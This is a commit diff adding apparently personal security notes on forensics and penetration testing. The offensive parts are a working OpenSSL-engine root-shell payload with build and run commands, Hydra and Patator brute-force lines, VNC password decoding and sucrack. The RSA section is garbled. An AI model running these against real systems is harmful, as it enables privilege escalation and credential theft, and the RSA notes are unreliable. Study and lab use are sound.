further restructuring
This commit is contained in:
parent
980fdf6242
commit
996f65fa61
|
@ -0,0 +1,44 @@
|
|||
# OpenSSL Engine
|
||||
|
||||
* Hook external libs
|
||||
* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)
|
||||
|
||||
* Most minimal example
|
||||
```C
|
||||
#include <openssl/engine.h>
|
||||
|
||||
static int bind(ENGINE *e, const char *id)
|
||||
{
|
||||
return 1;
|
||||
}
|
||||
|
||||
IMPLEMENT_DYNAMIC_BIND_FN(bind)
|
||||
IMPLEMENT_DYNAMIC_CHECK_FN()
|
||||
```
|
||||
|
||||
* Shell as root
|
||||
```C
|
||||
#include <openssl/engine.h>
|
||||
#include <unistd.h>
|
||||
|
||||
static int bind(ENGINE *e, const char *id)
|
||||
{
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
system("/bin/bash");
|
||||
}
|
||||
|
||||
IMPLEMENT_DYNAMIC_BIND_FN(bind)
|
||||
IMPLEMENT_DYNAMIC_CHECK_FN()
|
||||
```
|
||||
|
||||
* Compile
|
||||
```C
|
||||
gcc -fPIC -o rootshell.o -c rootshell.c
|
||||
gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
|
||||
```
|
||||
|
||||
* Execute via
|
||||
```sh
|
||||
openssl engine -t `pwd`/rootshell.so
|
||||
```
|
|
@ -0,0 +1,23 @@
|
|||
# OpenSSL Cheatsheet
|
||||
|
||||
## Extract keys from PFX Cert
|
||||
|
||||
* Key and cert form PFX
|
||||
```sh
|
||||
openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes
|
||||
openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys
|
||||
```
|
||||
|
||||
## Extract & Repack PFX Cert
|
||||
|
||||
* Extract & Repack with another password, e.g. from `mimikatz` to `cqure`
|
||||
```sh
|
||||
openssl pkcs12 -in *.pfx -out temp.pem -nodes
|
||||
openssl pkcs12 -export -out *.pfx -in temp.pem
|
||||
```
|
||||
|
||||
## Generate Certificate
|
||||
|
||||
```sh
|
||||
openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
|
||||
```
|
|
@ -0,0 +1,36 @@
|
|||
# RSA
|
||||
|
||||
* `p * q = n`
|
||||
* Coprime Phi is calculated either by [Euler Totient](https://en.wikipedia.org/wiki/Euler's_totient_function) or [greatest common divisor](https://en.wikipedia.org/wiki/Greatest_common_divisor) via [euclidean algorithm](https://crypto.stanford.edu/pbc/notes/numbertheory/euclid.html)
|
||||
* \\(1 < $\phi$ < n \\)
|
||||
* There is also $\phi$ = (p-1) * (q-1)
|
||||
|
||||
* Encryption, public key `e` is a prime between 2 and phi --> \\( 2 < e < $\phi$ \\)
|
||||
```python
|
||||
possible_e = []
|
||||
for i in range (2, phi):
|
||||
if gcd(n, i) == 1 and gcd(phi, i) == 1:
|
||||
possible_e.append()
|
||||
```
|
||||
|
||||
* Decryption, private key `d` --> \\( d * e mod $\phi$ = 1 \\)
|
||||
```python
|
||||
possible_d = []
|
||||
for i in range (phi + 1, phi + foo):
|
||||
if i * e mod phi == 1 :
|
||||
possible_d.append()
|
||||
```
|
||||
* \\( Cipher = msg ** d mod $\phi$ \\)
|
||||
* \\( Cleartext = cipher ** e mod $\phi$ )
|
||||
|
||||
## Euklid
|
||||
```python
|
||||
def gcd(a, b):
|
||||
if b == 0:
|
||||
return a
|
||||
return gcd(b, a % b)
|
||||
```
|
||||
|
||||
## Links
|
||||
|
||||
* [Encryption+Decryption](https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html)
|
|
@ -0,0 +1,23 @@
|
|||
# Kroll Artifact Parser
|
||||
|
||||
* Collect and processes artifacts on windows
|
||||
* Collects from live systems, mounted images and F-response tool
|
||||
|
||||
## Targets
|
||||
|
||||
* Needs source and target directory, as well as a module to process the files on
|
||||
* `Target` copies a file into a repository
|
||||
* `*.tkape` files contains metadata of the files to copy
|
||||
* `Compound Targets` contain metadata of multiple files in order to get a result quicker
|
||||
* `!Disable` do not appear in the target list
|
||||
* `!Local` keep on local
|
||||
|
||||
|
||||
## Modules
|
||||
|
||||
* Used on the targeted files
|
||||
* `*.mkape` files
|
||||
* Additional binaries are kept in `bin`
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,48 @@
|
|||
# NTFS
|
||||
|
||||
* Has the following advantages over FAT
|
||||
* Journaling
|
||||
* ACL
|
||||
* Volume Shadow Copy
|
||||
* Alternate Data Stream
|
||||
|
||||
## Master File Table
|
||||
* VBR references to `$MFT`
|
||||
* `$LOGFILE` stores transactions of the file system
|
||||
* `$UsnJrnl` changed files, and reason for change
|
||||
|
||||
## Caching
|
||||
|
||||
* File information is cached for frequent use in
|
||||
```sh
|
||||
C:\Windows\Prefetch\*.pf
|
||||
```
|
||||
* An SQLite database can be found under
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db
|
||||
```
|
||||
|
||||
## Jumplist
|
||||
|
||||
* Stores recently used files of applications inside the taskbar
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
|
||||
```
|
||||
|
||||
## Shortcut Files
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
|
||||
C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent\
|
||||
```
|
||||
|
||||
## Internet Explorer History
|
||||
```sh
|
||||
C:\Users\<username>\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat
|
||||
```
|
||||
|
||||
## Removeable Device Setup Log
|
||||
```sh
|
||||
C:\Windows\inf\setupapi.dev.log
|
||||
```
|
||||
|
||||
|
|
@ -0,0 +1,28 @@
|
|||
# oletools & Vmonkey
|
||||
|
||||
* Analyze ooxml and ole2 files
|
||||
|
||||
* [oletools repo](https://github.com/decalage2/oletools.git)
|
||||
|
||||
## Usage
|
||||
|
||||
* Check content of a stream
|
||||
```sh
|
||||
oledump.py file.doc -Ss <No. of stream>
|
||||
oledump.py file.doc -Ss <No. of stream> -v
|
||||
```
|
||||
```sh
|
||||
oledump.py -i file.doc
|
||||
```
|
||||
```sh
|
||||
olevba file.doc
|
||||
```
|
||||
|
||||
## Vipermonkey
|
||||
* For the lazy ones
|
||||
```sh
|
||||
vmonkey file.doc
|
||||
```
|
||||
|
||||
## scdbg
|
||||
* [scdbg repo](https://github.com/dzzie/SCDBG.git)
|
|
@ -0,0 +1,7 @@
|
|||
## Forensics References
|
||||
|
||||
## Volatility
|
||||
|
||||
[volatility](https://github.com/volatilityfoundation/volatility.git)
|
||||
[volatility3](https://github.com/volatilityfoundation/volatility3.git)
|
||||
|
|
@ -0,0 +1,91 @@
|
|||
# Volatility
|
||||
|
||||
Search through collected volatile memory dumps, volume and VM images.
|
||||
Volatility and Volatility 3 have a different syntax. The older one has
|
||||
higher malware hunting abilities.
|
||||
|
||||
* [Cheat sheet](https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf)
|
||||
* [Hacktricks shee](https://book.hacktricks.xyz/forensics/volatility-examples)
|
||||
* [Symbol table for Linux and macOS](https://github.com/volatilityfoundation/volatility3#symbol-tables)
|
||||
|
||||
## Basic Commands
|
||||
|
||||
* Basic Info, find OS profile
|
||||
```sh
|
||||
volatility -f <file.iso> imageinfo
|
||||
volatility -f <file.iso> kdbgscan
|
||||
```
|
||||
* Process list
|
||||
```sh
|
||||
volatility -f <file.iso> --profile <OSprofile> pslist
|
||||
```
|
||||
* List dlls
|
||||
```sh
|
||||
volatility -f <file.iso> --profile <OSprofile> dlllist -p <PID>
|
||||
```
|
||||
* Last accessed dir
|
||||
```sh
|
||||
volatility -f <file.iso> --profile <OSprofile> shellbags
|
||||
```
|
||||
|
||||
### Volatility3
|
||||
|
||||
* Basic Info works too, but you have to know the kind of OS anyway
|
||||
```sh
|
||||
volatility -f <file.iso> windows.info
|
||||
```
|
||||
|
||||
* Process list, but processes can be hidden. Therefore use ` psscan `
|
||||
```sh
|
||||
volatility -f <file.iso> windows.pslist
|
||||
volatility -f <file.iso> windows.psscan
|
||||
volatility -f <file.iso> windows.pstree
|
||||
```
|
||||
|
||||
* List dlls, this includes the path of the file
|
||||
```sh
|
||||
volatility -f <file.iso> windows.dlllist
|
||||
```
|
||||
|
||||
* Find malicious files, fileless and including files, respectively
|
||||
```sh
|
||||
volatility -f <file.iso> windows.malfind
|
||||
volatility -f <file.iso> windows.vadyarascan
|
||||
```
|
||||
|
||||
* Dump memory map
|
||||
```sh
|
||||
volatility -f <file.iso> windows.memmap.Memmap --pid <pid> --dump
|
||||
```
|
||||
|
||||
* Dump and scan files
|
||||
```sh
|
||||
windows.dumpfiles.DumpFiles Dumps cached file contents from Windows memory
|
||||
windows.filescan.FileScan Scans for file objects present in a particular windows. Lists version information from PE files.
|
||||
```
|
||||
|
||||
* Find file handles or mutex
|
||||
```sh
|
||||
volatility -f <file.iso> windows.mutex
|
||||
```
|
||||
|
||||
* Malware hunting through hooking
|
||||
```sh
|
||||
windows.ssdt.SSDT Lists the system call table. # System Service Descriptor Table
|
||||
windows.driverirp.DriverIrp List IRPs for drivers in a particular windows memory image.
|
||||
windows.modules.Modules Lists the loaded kernel modules.
|
||||
windows.driverscan.DriverScan Scans for drivers present in a particular windows
|
||||
```
|
||||
|
||||
|
||||
## Plugins
|
||||
|
||||
Volatility 3 plugins are named after the specific profile they are used for.
|
||||
For the most part these are (` macOS.*, windows.*, linux.* `)
|
||||
|
||||
* For example
|
||||
* Truecryptpassphrase
|
||||
* cmdscan, command history
|
||||
* shutdowntime
|
||||
|
||||
|
|
@ -0,0 +1,119 @@
|
|||
# Windows Registry
|
||||
|
||||
## Regedit Keys
|
||||
* HKEY_CURRENT_USER (HKCU), inside HKU
|
||||
* HKEY_USERS (HKU)
|
||||
* HKEY_LOCAL_MACHINE (HKLM)
|
||||
* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
|
||||
* `HKEY_CURREN_USER\Software\Classes` for settings of interactive user
|
||||
* `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
|
||||
* HKEY_CURRENT_CONFIG
|
||||
|
||||
## Paths
|
||||
* `C:\Windows\System32\Config`
|
||||
* Default -> `HKEY_USERS\DEFAULT`
|
||||
* SAM -> `HKEY_LOCAL_MACHINE\SAM`
|
||||
* SECURITY -> `HKEY_LOCAL_MACHINE\Security`
|
||||
* SOFTWARE -> `HKEY_LOCAL_MACHINE\Software`
|
||||
* SYSTEM -> `HKEY_LOCAL_MACHINE\System`
|
||||
|
||||
* `C:\Users\<username>\`
|
||||
* NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file
|
||||
* `C:\Users\<username>\AppData\Local\Microsoft\Windows`
|
||||
* USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file
|
||||
|
||||
* `C:\Windows\AppCompat\Programs\Amcache.hve`
|
||||
|
||||
### Transaction Logs
|
||||
* Transaction `<name of registry hive>.LOG` of the registry hive
|
||||
* Saved inside the same directory which is `C:\Windows\System32\Config`, as the hive which was altered.
|
||||
|
||||
### Backups
|
||||
* Saved every ten days
|
||||
* Look out for recently deleted or modified keys
|
||||
* `C:\Windows\System32\Config\RegBack`
|
||||
|
||||
## Data Acquisition
|
||||
* Tools
|
||||
* [Autopsy](https://www.autopsy.com/)
|
||||
* [FTK Imager](https://www.exterro.com/ftk-imager), does not copy `Amcache.hve`
|
||||
* [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape), preserves directory tree
|
||||
* `Registry Viewer`
|
||||
* `Zimmerman's Registry Explorer`, uses transaction logs as well
|
||||
* ` AppCompatCache Parser`
|
||||
* `RegRipper`, cli and gui
|
||||
|
||||
## System Information
|
||||
* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion`
|
||||
* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName`
|
||||
* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation`
|
||||
* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces`
|
||||
* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed`
|
||||
* Services -> `SYSTEM\CurrentControlSet\Services`
|
||||
* Service will start at boot with `start` key value `0x02`
|
||||
* Users, SAM -> `SAM\Domains\Account\Users`
|
||||
|
||||
|
||||
### Control Sets
|
||||
* `ControlSet001` -> last boot
|
||||
* `ControlSet002` -> last known good
|
||||
* `HKLM\SYSTEM\CurrentControlSet` -> live
|
||||
|
||||
* Can be found under:
|
||||
* `SYSTEM\Select\Current` shows the used control set
|
||||
* `SYSTEM\Select\LastKnownGood`
|
||||
|
||||
## Autostart Programs
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
|
||||
* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce`
|
||||
* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run`
|
||||
* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
|
||||
|
||||
## Recent Files
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. xml, pdf, jpg
|
||||
* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word`
|
||||
* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU`
|
||||
|
||||
## ShellBags
|
||||
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags`
|
||||
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU`
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
|
||||
|
||||
## Last Open/Saved/Visited Dialog MRUs
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU`
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU`
|
||||
|
||||
## Explorer Address/Search Bars
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery`
|
||||
|
||||
## User Assist
|
||||
* GUI applications launched by the user
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count`
|
||||
|
||||
## Shim Cache
|
||||
* Application Compatibility, AppCompatCache
|
||||
* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache`
|
||||
* Use `AppCompatCacheParser.exe --csv <path to save output> -f <path to SYSTEM hive for data parsing> -c <control set to parse>`
|
||||
|
||||
### AmCache
|
||||
* Information about recently run applications on the system
|
||||
* `C:\Windows\appcompat\Programs\Amcache.hve`
|
||||
* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\`
|
||||
* Saves SHA1 of the last executed app
|
||||
|
||||
## Background Activity Monitor/Desktop Activity Moderator BAM/DAM
|
||||
* Saves full path of executed apps
|
||||
* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`
|
||||
* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}`
|
||||
|
||||
## Devices
|
||||
* Identification
|
||||
* USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB`
|
||||
* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices`
|
||||
* First time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064`
|
||||
* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066`
|
||||
* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067`
|
||||
|
|
@ -0,0 +1,32 @@
|
|||
# iOS Devices
|
||||
|
||||
## Trust Certificates
|
||||
* Exchanged between 'Trusted' devices and the charging iOS device.
|
||||
* iTunes access to the iOS device has elevated permissions using the cert.
|
||||
* Keychain may be extracted through iTunes.
|
||||
|
||||
## Interesting Files
|
||||
* `ResetCounter.plist`, hard Reset diagnostic counter
|
||||
* `com.apple.preferences.datetime.plist`
|
||||
* DB tables
|
||||
* Atendee
|
||||
* Task
|
||||
* Event
|
||||
* Mail
|
||||
* Safari
|
||||
* Cookies
|
||||
* Pictures
|
||||
* Addressbook
|
||||
* SMS
|
||||
* Voicemail
|
||||
* WiFi Keys
|
||||
|
||||
## Backups
|
||||
Encrypted and unencrypted backups can be chosen in the iTunes menu.
|
||||
|
||||
|
||||
## Tools
|
||||
* [iFunbox](https://www.i-funbox.com/en/page-about-us.html)
|
||||
* [O.MG cable](https://shop.hak5.org/products/o-mg-cable)
|
||||
|
||||
|
|
@ -0,0 +1,23 @@
|
|||
# Patator Bruteforcing
|
||||
|
||||
* [Lanjelot's Repo](https://github.com/lanjelot/patator/)
|
||||
|
||||
## Modules
|
||||
|
||||
* Available modules can be found under `patator --help`
|
||||
* Module specifics can be found via `patator <module> -h`
|
||||
|
||||
## Using a Module
|
||||
|
||||
* For example `http_fuzz` can be used via
|
||||
```sh
|
||||
TARGET_IP=10.0.47.11
|
||||
CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
|
||||
SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
|
||||
|
||||
echo "The CSRF is: $CSRF"
|
||||
echo "The PHPSESSID is: $SESSION_ID"
|
||||
|
||||
patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x
|
||||
```
|
||||
|
|
@ -0,0 +1,6 @@
|
|||
# haiti
|
||||
|
||||
* Hash Identifier
|
||||
```sh
|
||||
haiti <hash>
|
||||
```
|
|
@ -0,0 +1,24 @@
|
|||
# Hashcat Utilities
|
||||
|
||||
* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
|
||||
|
||||
## Wordlists
|
||||
|
||||
* Combine wordlists
|
||||
```sh
|
||||
combinator wordlist.txt otherwordlist.txt > newwordlist.txt
|
||||
```
|
||||
|
||||
* Create wordlist
|
||||
```sh
|
||||
hashcat --force <input.txt> -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
|
||||
```
|
||||
|
||||
## Using Masks
|
||||
|
||||
* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset
|
||||
* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack)
|
||||
* Bruteforcing seven lowerspace characters using `SHA2-384` as an example
|
||||
```sh
|
||||
hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l
|
||||
```
|
|
@ -0,0 +1,37 @@
|
|||
# Hydra usage
|
||||
|
||||
## Examples
|
||||
|
||||
* HTTP post form
|
||||
```sh
|
||||
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
|
||||
```
|
||||
* HTTP basic auth
|
||||
```sh
|
||||
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
|
||||
```
|
||||
|
||||
|
||||
|Command|Description|
|
||||
|-------|-----------|
|
||||
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|
||||
|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|
||||
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|
||||
|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
|
||||
|
||||
## Parameter
|
||||
|
||||
|Option|Decription|
|
||||
|------|----------|
|
||||
|-l|Single username|
|
||||
|-P|Indicates use the following wordlist|
|
||||
|http-post-form|indicates the method|
|
||||
|/login url|the login URL|
|
||||
|:username|the form field where the username is entered|
|
||||
|^USER^|tells Hydra to use the username from -l|
|
||||
|password|the formfield where the password is entered|
|
||||
|^PASS^|tells Hydra to use the wordlist from -P|
|
||||
|Login|indicates to Hydra the login failed message|
|
||||
|Login failed|is the login failure message that the form returns|
|
||||
|F=incorrect|If this word appears on the page, login failed|
|
||||
|-V| verbose|
|
|
@ -0,0 +1,43 @@
|
|||
# John The Ripper
|
||||
|
||||
* [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
# Usage
|
||||
|
||||
* Example
|
||||
```sh
|
||||
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
|
||||
```
|
||||
|
||||
## Declaring Structure
|
||||
* List subformat
|
||||
```sh
|
||||
john --list=subformats
|
||||
```
|
||||
```sh
|
||||
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2
|
||||
```
|
||||
|
||||
## Rules
|
||||
* [Rule syntax](https://www.openwall.com/john/doc/RULES.shtml)
|
||||
* Create a local rules file, e.g. `/etc/john-local.conf` or `/usr/share/john/john-local.conf`
|
||||
* Create config for mutations, e.g. border mutation
|
||||
```sh
|
||||
[List.Rules:border]
|
||||
$[0-9]$[0-9]
|
||||
```
|
||||
* Run john with parameter `--rules=border`
|
||||
|
||||
### Existing Rules
|
||||
* `l33t`, l33tsp34k
|
||||
* `NT`, case mutation
|
||||
* Example for `best64`
|
||||
```sh
|
||||
john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
|
||||
```
|
||||
|
||||
### Subformats
|
||||
* Some salted passwords need dynamic rules
|
||||
```sh
|
||||
john --list=subformats
|
||||
```
|
|
@ -0,0 +1,6 @@
|
|||
# VNC Password Decoding
|
||||
|
||||
* Found passwords in vnc config files may be decoded via
|
||||
```sh
|
||||
echo -n "<key>" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv
|
||||
```
|
|
@ -0,0 +1,8 @@
|
|||
# sucrack
|
||||
|
||||
* [Repo](https://github.com/hemp3l/sucrack.git)
|
||||
* Upload to target and build
|
||||
```sh
|
||||
sucrack -u <username> -w 100 <wordlist>
|
||||
```
|
||||
|
|
@ -0,0 +1,19 @@
|
|||
# Hashes References
|
||||
|
||||
## Password and Username Generation
|
||||
|
||||
[exrex](https://github.com/asciimoo/exrex.git)
|
||||
[namely](https://github.com/OrielOrielOriel/namely.git)
|
||||
|
||||
## Password Cracking
|
||||
|
||||
[Colabcat](https://github.com/someshkar/colabcat.git)
|
||||
|
||||
## Default Passwords
|
||||
|
||||
[default-password](https://default-password.info)
|
||||
[datarecovery](https://datarecovery.com/rd/default-passwords/)
|
||||
|
||||
## Wordlist Manager
|
||||
|
||||
[wordlistctl](https://github.com/BlackArch/wordlistctl.git)
|
|
@ -0,0 +1,592 @@
|
|||
#!/usr/bin/env python
|
||||
# encoding: utf-8
|
||||
# Hash Identifier
|
||||
# By Zion3R
|
||||
# www.Blackploit.com
|
||||
# Root@Blackploit.com
|
||||
|
||||
from builtins import input
|
||||
from sys import argv, exit
|
||||
|
||||
version = 1.2
|
||||
|
||||
logo=''' #########################################################################
|
||||
# __ __ __ ______ _____ #
|
||||
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
|
||||
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
|
||||
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
|
||||
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
|
||||
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
|
||||
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' #
|
||||
# By Zion3R #
|
||||
# www.Blackploit.com #
|
||||
# Root@Blackploit.com #
|
||||
#########################################################################'''
|
||||
|
||||
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
|
||||
|
||||
# hash.islower() minusculas
|
||||
# hash.isdigit() numerico
|
||||
# hash.isalpha() letras
|
||||
# hash.isalnum() alfanumerico
|
||||
|
||||
def CRC16(hash):
|
||||
hs='4607'
|
||||
